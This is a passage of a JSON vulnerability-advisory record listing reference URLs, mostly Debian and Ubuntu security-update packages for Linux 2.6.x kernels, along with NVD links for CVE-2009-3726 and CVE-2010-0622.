        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0622"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
